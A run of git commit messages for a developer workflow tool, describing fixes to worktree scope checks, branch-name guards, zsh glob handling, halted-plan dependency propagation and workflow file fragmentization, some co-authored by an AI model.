Binds the advisory diff-vs-declared-scope check to behavior before it exists:
the pure coverage predicate, the SUMMARY-artifact exemption and its parity with
the rescue walker, the gauntlet integration (never flips ok, degrades on a git
failure, survives a later block), the manifest normalizer's files_modified
handling, and the --files negative-input matrix on record-agent/create.

Refs #2596

* enhance(#2596): warn when a wave branch commits outside its declared scope

The worktree-wave merge gauntlet validated branch, base, deletions, SUMMARY
rescue and a clean worktree, but never compared a plan branch's actual
committed diff against the files_modified the plan declared — so an executor
that committed outside its brief merged into shared phase state silently.

Adds an advisory scope-conformance check: when the manifest entry carries a
declared scope, the gauntlet diffs HEAD...<branch> and appends one structured
warning per path outside it. It never flips ok and never blocks the merge;
promotion to a hard gate is a separate, disclosed change. With no declared
scope no git subprocess is spent at all.

Refs #2596

* docs(#2596): document the advisory worktree-wave scope-conformance check

Records the optional --files flag on worktree record-agent/create, the
advisory warnings channel cleanup-wave now emits, and its two deliberate
noise limits (SUMMARY-artifact exemption, literal-prefix glob matching).
Wires execute-phase to pass the plan's already-parsed PLAN_FILES.

Refs #2596

* fix(#2596): close review findings on the scope-conformance advisory

- share one path normalizer between the SUMMARY-artifact predicate and the
  scope comparison so the exemption and the check cannot drift
- wire --files into the orchestrator-worktree dispatch, which created a
  worktree but never declared its scope, so the advisory silently did not
  apply on that backend; ADR-1239 requires both adapters share one check
- correct the now-false blockquote claiming the check does not exist yet
- add the fast-check property tests the repo requires for parser logic
- add the record-agent/create parity test that Generative Fix Divergence
  requires for two surfaces implementing one rule

Refs #2596

* fix(#2596): keep execute-phase.md under the frozen pre-phase-6 byte ceiling

The one-sentence note added with the --files flag pushed execute-phase.md to
93708 bytes, past the ADR-857 PRE_PHASE6 cap of 93600 — the tightest of the
three workflow size gates, and a hard cap an acknowledgment cannot clear. It
failed three tests plus the differential attribution check.

Condense the note to a one-line pointer (93543, 57 B of headroom); the full
explanation already lives in docs/CLI-TOOLS.md and the dispatch step. The flag
itself stays in the command, because the orchestrator reads this workflow at
runtime and cannot pick it up from docs/.

Acknowledge the remaining 143 B of growth by appending to the existing
execute-phase.md fragment rather than adding a second one — the ack lint
rejects two sources naming the same path.

Refs #2596

* fix(#2596): make the execute-phase.md edit net-negative, not merely under the cap

The size gate on this file is two assertions, not one: bytes < 93600 AND
bytes <= 93400. The base is exactly 93400, so the file is at its budget and
any growth trips the margin assertion — the previous fix cleared the ceiling
but not that.

Move the --files explanation to per-plan-worktree-gate.md, which already owns
PLAN_FILES and carries no cap, and reclaim the rest from two clauses in the
sentence being edited: the cleanup-wave rules phrasing, and a 'non-zero exit'
the very next sentence already states. execute-phase.md ends at 93392, eight
bytes below base. The flag itself stays in the command — the orchestrator
reads this workflow at runtime and cannot pick it up from docs/.

With no growth left, the acknowledgment is unnecessary and its byte delta was
no longer true, so the shared ack fragment is restored byte-identical to base.

Refs #2596

* docs(#2596): add the how-to for interpreting scope-conformance warnings

The docs for this change were entirely Reference — the flag and the warning
codes — with the task-oriented quadrant empty. Adds the page that answers the
question an operator actually has when the advisory fires: what the two codes
mean, that nothing is blocked so there is no failure to hunt for, how to tell
whether the executor over-reached or the plan under-declared, and the three
ways the check legitimately stays silent so an absence of warnings is not
mistaken for proof of conformance.

Refs #2596

* chore(#2596): backfill changeset pr number to 3264

---------

Co-authored-by: sim <sim@local>
2026-08-09 16:12:57 -04:00
Tom Boucher
10da377794 fix(#3021): recognize worktree-wf_* branch namespace in all guards (#3109)
* fix(#3021): recognize worktree-wf_* branch namespace in all guards

The Claude-orchestration Workflow backend (#1143) creates per-plan
worktrees on branches named worktree-wf_<runid>-<n>. Four independent
copies of the agent branch allow-list regex (^(worktree-)?agent-...) never
learned this namespace:
- hooks/gsd-worktree-path-guard.js:176 — FAILED OPEN (process.exit(0)),
  silently disabling path containment for exactly the concurrent dispatch
  mode where cross-worktree writes are most likely
- src/worktree-safety.cts:21 — silently dropped cleanup-wave manifest
  entries
- agents/gsd-executor.md:503 — FATAL halt on branch check
- gsd-core/references/worktree-branch-check.md:33 — same FATAL halt

Extended all four to ^((worktree-)?agent-|worktree-wf_)[A-Za-z0-9._/-]+$.
The path guard now correctly blocks cross-worktree writes for Workflow-
backend branches instead of no-op'ing.

* chore(#3021): backfill changeset PR number 3109

---------

Co-authored-by: sim <sim@local>
2026-08-06 04:26:59 -04:00
Tom Boucher
589a9b29b0 fix(#2962): enable nullglob in for-glob shell blocks for zsh portability (#3087)
* fix(#2962): enable nullglob in for-glob shell blocks for zsh portability

Workflow shell blocks are fenced bash but execute in the user's login shell
(zsh on macOS). zsh's nomatch default aborts the WHOLE block on an unmatched
glob in a for-list (not just skipping the command), silently bypassing every
statement after it — including the verify-phase decision-coverage gate,
whose optional *-CONTEXT.md lookup used the unsafe for-list form so the
DECISION_RESULT= assignment on the next line never ran under zsh.

Fix: prepend a portable nullglob shim to every bash block containing a
for-glob loop:
  shopt -s nullglob 2>/dev/null; setopt NULL_GLOB 2>/dev/null
Each command no-ops (stderr suppressed) in the shell that doesn't recognize
it; the matching shell enables nullglob so an unmatched glob expands to
nothing and the loop body is skipped cleanly. Verified locally: both zsh and
bash now reach end-of-block (rc=0) on a no-match glob; bash matched-case
behavior unchanged.

14 blocks across 7 files: verify-phase.md (4, incl. the decision-coverage
gate), review.md, execute-phase.md, resume-project.md, complete-milestone.md,
audit-milestone.md, gsd-integration-checker.md, gsd-plan-checker.md (3).
Closes the zsh bypass of the #2770 fix.

* chore(#2962): add changeset fragment

* chore(#2962): backfill changeset PR number 3087

---------

Co-authored-by: sim <sim@local>
2026-08-05 15:42:51 -04:00
Tom Boucher
b146b82e3c fix(#2868): resume a phase stranded between its last plan and verification (#3041)
* fix(#2868): resume a phase stranded between its last plan and verification

discover_and_group_plans exited unconditionally once every plan was filtered
out, conflating "no plan work left" with "phase fully done". Those differ once a
run can be interrupted between the final wave's SUMMARY and the verify step --
most often by a checkpoint plan that is retired but still writes a SUMMARY. The
result was a phase that looked healthy from every index yet had no
VERIFICATION.md, and whose recommended recovery command provably no-opped,
because the only step that produces the artifact sits ten steps past that exit.

The exit is now conditional. When the verification report is genuinely missing
and no filter is active, the run reports the situation by name and continues at
the tail gates instead of stopping.

Two guards keep the normal paths untouched:

- A filtered run (--gaps-only, or an explicit wave) finding nothing left in its
  own slice says nothing about whether the phase as a whole is done, so it exits
  exactly as before. Without this, --wave 1 on a finished first wave would jump
  to verification with later waves still outstanding.
- A phase that already has its report exits as before too.

The recovered path deliberately keeps the code-review and regression gates. The
manual workaround this replaces skipped both, and that gap is the reason a real
route exists rather than telling users to spawn the verifier by hand.

Also acknowledges the emitted growth of the workflow file. As with #2830 it is
appended to the fragment that already owns that path, since the linter hard-fails
when two acknowledgment sources name the same one.

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

* fix(#2868): never treat a blocked-and-incomplete phase as finished

Three findings from adversarial review, all fixed.

BLOCKER -- the trigger conflated two different zero-runnable states. This step
now has two skip rules: has_summary (the #2868 target) and, from #2830, a skip
for plans whose blocked_by is non-empty. "All filtered" was therefore reachable
with plans that never ran: plan A halts and is summarized, plan B is blocked by
A and has no summary. The resume path fired, announced "All N plans are
summarized" -- false -- skipped the wave steps so B was never dispatched, and
jumped to the gates. B was silently abandoned, which is the same class of
disappearance #2830 exists to prevent, reintroduced one layer up.

The decision is now an explicit ordered three-way: a filtered run exits
unchanged; any blocked-plan skip reports the phase as stuck on a halt and exits,
routing to resolving the halt rather than to verification; only an
all-summarized, unfiltered phase with a missing report resumes.

MAJOR -- RESUME_TAIL_ONLY was set and never read anywhere in the workflow or its
step fragments. Dead state implying enforcement that did not exist. Removed; the
imperative at the decision point is what actually carries the control flow, so it
now says so plainly.

MAJOR -- the resume path skipped aggregate_results, which is the only step that
runs the secure-phase threats-open gate. A phase with open threats would have
advanced with no warning where a normal run always shows one. The path now
enters at aggregate_results, verified to read only on-disk phase artifacts and
independent queries, so it tolerates having executed no plans this run.

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

* chore(#2868): backfill changeset pr number

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 5 <noreply@anthropic.com>
2026-08-04 08:38:31 -04:00
Tom Boucher
ef823ca9d9 fix(#2830): propagate a halted plan to its transitive dependents (#3038)
* test(#2830): add failing regression tests for halted-plan dependent blocking

Add tests/fix-2830-halted-plan-dependents.test.cjs covering direct,
transitive (2 and 3 hop), and diamond dependents of a halted plan across
both independent "which plans are incomplete" readers (phase-plan-index's
cmdPhasePlanIndex and findPhaseInternal/searchPhaseInDir), the negative
case (an unrelated decoupled plan stays runnable), and a parity check that
the two readers agree. Uses only modules that already exist at this
commit (gsd-tools.cjs via subprocess, the pre-existing phase-locator.cjs)
so the test file loads and runs cleanly on a fresh clone of this exact
commit. These fail against current behavior: neither reader has any
concept of a halted plan or a blocked_by/runnable view yet.

* fix(#2830): a halted plan no longer leaves its dependents on the runnable work list

A plan that reaches a designed stop still writes a SUMMARY, so both
"which plans are incomplete" readers saw it as an ordinary completion and
reported its dependents as ordinary runnable work — never checking
whether an upstream plan had halted rather than finished.

- New `status: halted` frontmatter value, documented in all four SUMMARY
  templates alongside the existing `status: complete`.
- New shared src/plan-dependency-graph.cts: a single computeHaltPropagation
  pass that both phase.cts's cmdPhasePlanIndex (wave-grouping) and
  phase-locator.cts's searchPhaseInDir (the phase-location primitive, ~50
  dependent symbols across 5 command routers) now call, so the
  two-implementation divergence that caused this bug cannot recur. It
  accepts an optional precomputedOrder so cmdPhasePlanIndex — which already
  runs Kahn's algorithm in computeDependencyLevels for wave assignment —
  passes that order straight through instead of a second traversal;
  searchPhaseInDir (no prior traversal) lets the module derive its own.
  The two small duplicated predicates each reader would otherwise carry
  (is this status "halted"?, which summary file matches which plan id?)
  are centralized in the same module as isHaltedStatus/buildSummaryFileIndex.
- Additive fields only: `halted`/`blocked_by`/`runnable` on
  cmdPhasePlanIndex's plans[] and top level, `halted_plans`/`blocked_by`/
  `runnable_plans` on searchPhaseInDir's result. The pre-existing
  `incomplete`/`incomplete_plans` fields are unchanged in meaning and
  membership.
- execute-phase.md's discover_and_group_plans step now also skips any
  plan whose `blocked_by` is non-empty, reporting it by name with its
  blocking chain, in addition to (not instead of) the existing
  has_summary skip rule.

Extends tests/fix-2830-halted-plan-dependents.test.cjs (introduced in the
prior commit) with direct unit coverage of computeHaltPropagation
(including the precomputedOrder call shape) and a fast-check property
test — both only possible once this commit's new module exists.

Closes #2830

* fix(#2830): surface the halt-aware view from init execute-phase

The adopted work made phase-locator compute halted_plans / blocked_by /
runnable_plans, but cmdInitExecutePhase builds its output by explicitly
enumerating fields, so all three were computed and then silently dropped at
the exact consumer the issue names as regressed.

Forwards them additively -- incomplete_plans and incomplete_count keep their
name, type and semantics byte-for-byte -- and adds the same three empty
defaults to the roadmap-only fallback so the shape is consistent in both
branches. Covered by a new test that drives the real CLI end to end rather
than the locator function, since the locator already worked.

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

* fix(#2830): fail closed on dependency cycles and stop the templates inviting the defect

Three review findings, all fixed:

- BLOCKER (isolated adversarial). Cycle participants never reach indegree 0 in
  the Kahn pass, so they were excluded from the topological order, never visited
  by the forward pass, and vanished from blocked_by entirely -- i.e. reported as
  runnable. The wave-grouping reader hard-fails on a cycle so it never hit this,
  but the phase-location reader does not, so init execute-phase offered a plan
  depending directly on a halted plan. Reproduced, then fixed in the shared
  engine so every consumer is safe regardless of pre-checks: a node absent from
  the order is now blocked with a deterministic, non-empty named cause. A plan
  silently missing from both blocked_by and runnable is the exact disappearance
  this issue exists to prevent.

- MAJOR (isolated adversarial). All four summary templates showed the field as
  an inline comment on the value line. Frontmatter parsing does not strip
  trailing comments, so an executor copying the templates' own presentation
  wrote a halt that parsed as a non-halted string, silently reproducing the
  original bug. Guidance moved off the value line, and the halt predicate now
  tolerates an unquoted trailing comment.

- HARD standards violation. A test regex-matched child-process stderr prose for
  /cycle/i, which CONTRIBUTING bans. Replaced with the structured failure signal
  plus a differential assertion (same fixture without the cycle edge must
  succeed), so it stays cycle-specific without matching prose.

Also folds the duplicated read-summary-and-check-halted wrapper out of both
readers into the shared module -- centralizing only the predicate left the exact
two-copies-that-drift pattern the module exists to prevent -- and commits the
artifact-types documentation for the new status value.

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

* test(#2830): stop the property generator hanging the whole suite

The remote runner did not fail -- it hung. Two containers sat in this file for
31+ minutes, and an earlier attempt ran 9 hours before I killed it. The runner
passes --test-timeout=0, so nothing ever reaps it: this would have hung CI
indefinitely, not reported a failure.

Root cause: the DAG generator built edges by rejection --

  from: fc.integer({ min: 0, max: n - 1 })
  to:   fc.integer({ min: 0, max: n - 1 })
  .filter(({ from, to }) => from < to)

With n === 1 both integers are forced to 0, so the predicate is unsatisfiable
and fast-check retries value generation forever. n is drawn from 1..12 and
fast-check biases toward boundary values, so n === 1 is reached almost at once.

This also explains why the failing-first run completed normally while the fixed
run hung: before the fix the graph module did not exist, so the property test
threw on import and never reached generation. It only starts hanging once the
code under test works.

Generates the DAG by construction instead -- `to` is drawn strictly above
`from`, with the degenerate single-node case short-circuited to an empty edge
list -- so no rejection sampling is involved. Switches the import to the shared
fast-check setup so the seed and run count are pinned per CONTRIBUTING, and adds
a bounded regression guard that samples the arbitrary directly, so a future
reintroduction fails loudly instead of hanging.

Verified: the file now completes in 2 seconds, 29 tests started and 29 finished,
zero failures, against an indefinite hang before.

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

* fix(#2830): restore the depends_on display contract and acknowledge the workflow growth

Full-suite run surfaced two things the focused harnesses could not.

1. Regression of a pinned pre-existing contract (#3785). A refactor routed the
   EMITTED depends_on field through the new dependency resolver, which also
   consults the canonical-prefix map. The original consulted the plan map only,
   so a short canonical prefix passed through verbatim -- '24-01' stayed
   '24-01' rather than becoming '24-01-auth-hardening'. The emitted field is a
   DISPLAY mapping, not the DAG resolution, and #3785 pins that. Reverted with
   a comment recording why it must not use the resolver; full resolution is
   still used for the wave DAG and halt propagation, which is what needs it.

2. The workflow file grew 518 bytes without an acknowledgment, from the
   halt-aware skip rule and the widened parse contract. Acknowledged.

Note on where the acknowledgment landed: the guidance is to add a NEW fragment,
but execute-phase.md is already named by an existing fragment and the linter
hard-fails when two ack sources name the same path. Appending to the owning
fragment, following its own established multi-PR pattern, was the only
lint-clean option.

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

* chore(#2830): backfill changeset pr number

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

---------

Co-authored-by: sim <sim@local>
Co-authored-by: Claude Opus 5 <noreply@anthropic.com>
2026-08-04 06:47:46 -04:00
Tom Boucher
ad3b9ec486 chore(#1671): fragmentize plan-phase.md and repair flag forwarding to the init bundle — Phase 6.2 (#3019)
* chore(#2993): fragmentize plan-phase.md onto the fragment model

Epic #1671 Phase 6.2. plan-phase.md is the largest workflow in the repo and
carried zero markers; it was deferred out of the Phase 3 pilot for two
reasons, both now dead. The 36-byte PRE_PHASE6 headroom was never the
blocker it looked like — fragmentizing is net-negative on host source, so
the trim is what creates the room. The --mvp interleaving was resolved by
measurement in #2992 and no sub-line mechanism is built.

- widen WHEN_VOCABULARY 14 -> 19 via a second coordinated ADR-1671
  amendment: flag:--ingest, flag:--prd, flag:--research-phase,
  flag:--reviews, state:chunked-mode
- state:chunked-mode is `--chunked` OR config workflow.plan_chunked, and
  that disjunction is resolved in the FACT, never in the grammar, so a
  compound condition never becomes an operator
- parse the new flags on the plan-phase route; extract six gated bodies to
  gsd-core/workflows/plan-phase/steps/ behind manifest-gated stubs
- prd-express-path.md was already extracted but read unconditionally; its
  wrapper is now gated, so the existing extraction finally pays off

plan-phase.md 94,483 -> 87,575 bytes (cap 94,519): headroom goes from 36
bytes to 6,944.

Also closes a surfaced docs gap: five real plan-phase flags (--chunked,
--skip-ui, --bounce, --skip-bounce, --granularity) were documented in
neither the argument-hint nor help. Making --chunked load-bearing without
fixing its siblings would leave the defect class half-open.

Refs #2993

* fix(#2993): forward flags to the init bundle so section gating actually fires

Blocker found by the correctness review, confirmed directly, and missed by
both the isolated reviewer and every test in this branch.

Neither workflow forwarded its flags to the init CLI:

  plan-phase.md:71    INIT=$(gsd_run query init.plan-phase "$PHASE" $GRAN_PARAM)
  execute-phase.md:84 INIT=$(gsd_run query init.execute-phase "${PHASE_ARG}")

So every flag: atom was permanently false in production and its section
permanently excluded. For plan-phase that made the PRD express path
UNREACHABLE — a regression, since it was an unconditional read before.
For execute-phase this is PRE-EXISTING: #2932 shipped `flag:--wave` gating
that has never once been true, so `--wave` silently dropped its own
wave-filtering guidance. Fixed here under the no-defer rule.

Why every test missed it: they drive the init CLI directly with flags,
which works. Production goes through the workflow's bash line, which did
not pass them — the exact "assert against the shape production uses" trap
this branch's own test matrix warns about.

- parse and forward --prd/--ingest/--research-phase/--reviews/--chunked
  (plan-phase) and --wave (execute-phase), using the anchored regex idiom
  the neighbouring GRAN_PARAM line already uses
- add a regression guard DERIVED FROM THE MANIFEST: for every flag:--X
  section, the owning workflow's init line must forward --X. It fails
  against the pre-fix files and covers any future atom, rather than
  spot-checking today's six.

Verified through the workflow shape, not the CLI shape: `3 --prd spec.md`
now yields ["prd-express-gate"] (was []), `2 --wave 2` yields
["partial-wave"] (was []).

Refs #2993

* test(#2993): acknowledge the execute-phase ripple and regenerate install-tree fixtures

Remote matrix was red with 46 unique failures, identical on both lanes.
Both causes are mechanical consequences of changing shipped workflow
content, and neither is visible to any local gate.

- emitted-attribution: execute-phase.md grew 163 bytes from the WAVE_PARAM
  forwarding fix and was unacknowledged, while the ack fragment named
  plan-phase.md, which SHRANK and therefore needed no ack at all — a stale
  entry is itself a failure. The reason now names the real ripple.
  The entry had to merge into the existing 2930 fragment: the ack linter
  does unconditional cross-fragment duplicate-key detection with no
  spent/live exception, so a second fragment declaring execute-phase.md
  collides even when the first is already merged and inert. Resolved per
  the linter's own guidance and that file's precedent of appending
  successive ripple reasons to one entry.
- golden-install-tree: tests/fixtures/install-tree/*.json are committed and
  deliberately excluded from the ADR-2719 attribution cutover, so they must
  be regenerated when shipped tree content changes. Regenerated after
  build:lib per the ordering landmine. 19 runtimes each gained exactly the
  six new plan-phase step files; zero paths removed, which is the absolute
  failure shape those fixtures exist to catch.

Refs #2993

* fix(#2993): restore the launcher preamble in an extracted step and follow moved content in its drift guards

Second red run: 26 unique failures, identical on both lanes, in two classes.

RUNTIME BUG (runtime-launcher-parity, 7 failures) — chunked-planning-mode.md
calls gsd_run but carried no canonical launcher preamble, which is what
DEFINES gsd_run(). On any non-Claude runtime that step would fail outright.
The preamble is now copied verbatim from the canonical source of truth,
gsd-core/workflows/_runtime-launcher.snippet.sh, and the fence dedented to
column 0 to match the prd-express-path.md sibling (a list-continuation
indent breaks the byte-equal preamble match). prd-express-path.md already
had a correct one. This is the same defect #2932 hit when it extracted
steps; the parity test caught a real bug, not a stale assertion.

DRIFT GUARDS (plan-phase-drift-guard, issue-2762-plan-reviews-chunked,
skill-frontmatter-contract) — these assert plan-phase.md contains content
this branch moved into step files. Retargeted at where the content now
lives, with the asserted property unchanged; the ALL-RUNTIMES label COUNT
test now reads host + every step file so the count is preserved across the
split rather than reduced. Each retargeted guard was verified to still fail
when its step file is stripped, so none was weakened into vacuity.

No emitted-drift ack was needed: currentSizes() enumerates
gsd-core/workflows/*.md non-recursively, so files under
plan-phase/steps/ are never in the size ratchet's scope.

Refs #2993

* chore(#2993): backfill changeset pr number to 3019

---------

Co-authored-by: sim <sim@local>
2026-08-03 09:38:58 -04:00
Tom Boucher
a987cf2731 chore(#2932): emit a per-invocation section manifest from the init bundle (#2987)
* chore(#2932): emit a per-invocation section manifest from init

Extends the init bundle with a typed per-invocation section manifest so an
invocation loads only the branch guidance it will actually take.

The three flag/state-gated branches in execute-phase.md move into their own
step files; the parent keeps its gsd:section markers wrapping a one-line
on-demand reference, so each section's prose lives in exactly one file and
the parent shrinks 93369 -> 89507 bytes. A new drift-guarded generator
derives the shipped section manifest from those markers, and a new pure
evaluator maps invocation facts to applicable section ids.

The evaluator is a lookup over the frozen WHEN_VOCABULARY, never a parser
(Greenspun's Tenth Rule, ADR-1671:69); a parity test asserts the vocabulary
and the predicate map stay exhaustively in sync.

Closes #2932

* fix(#2932): fail closed on prototype-chain when values

An isolated adversarial review found WHEN_PREDICATES[section.when] was a
bracket lookup on a plain-prototype object, so inherited Object.prototype
members resolved as predicates: "constructor"/"toString"/"valueOf"/
"hasOwnProperty" returned truthy and SILENTLY INCLUDED the section, and
"__proto__" threw an untyped TypeError carrying no .reason. Both violate
the module's documented fail-closed contract, and the manifest is read from
disk at run time so it cannot be assumed trustworthy.

Builds the predicate map on a null prototype and guards the lookup with an
explicit Object.hasOwn check. Adds table-driven coverage for nine
Object.prototype-shaped keys asserting the TYPED reason (asserting only
that it throws would still pass while broken) plus a fast-check property
injecting a hostile value at an arbitrary document position.

* test(#2932): retarget execute-phase step assertions at extracted step files

* fix(#2932): emit typed reasons for generator lib-load and write failures

* fix(#2932): restore launcher preamble in extracted steps and refresh derived fixtures

* chore(#2932): backfill changeset pr number to 2987

---------

Co-authored-by: sim <sim@local>
2026-08-02 12:34:41 -04:00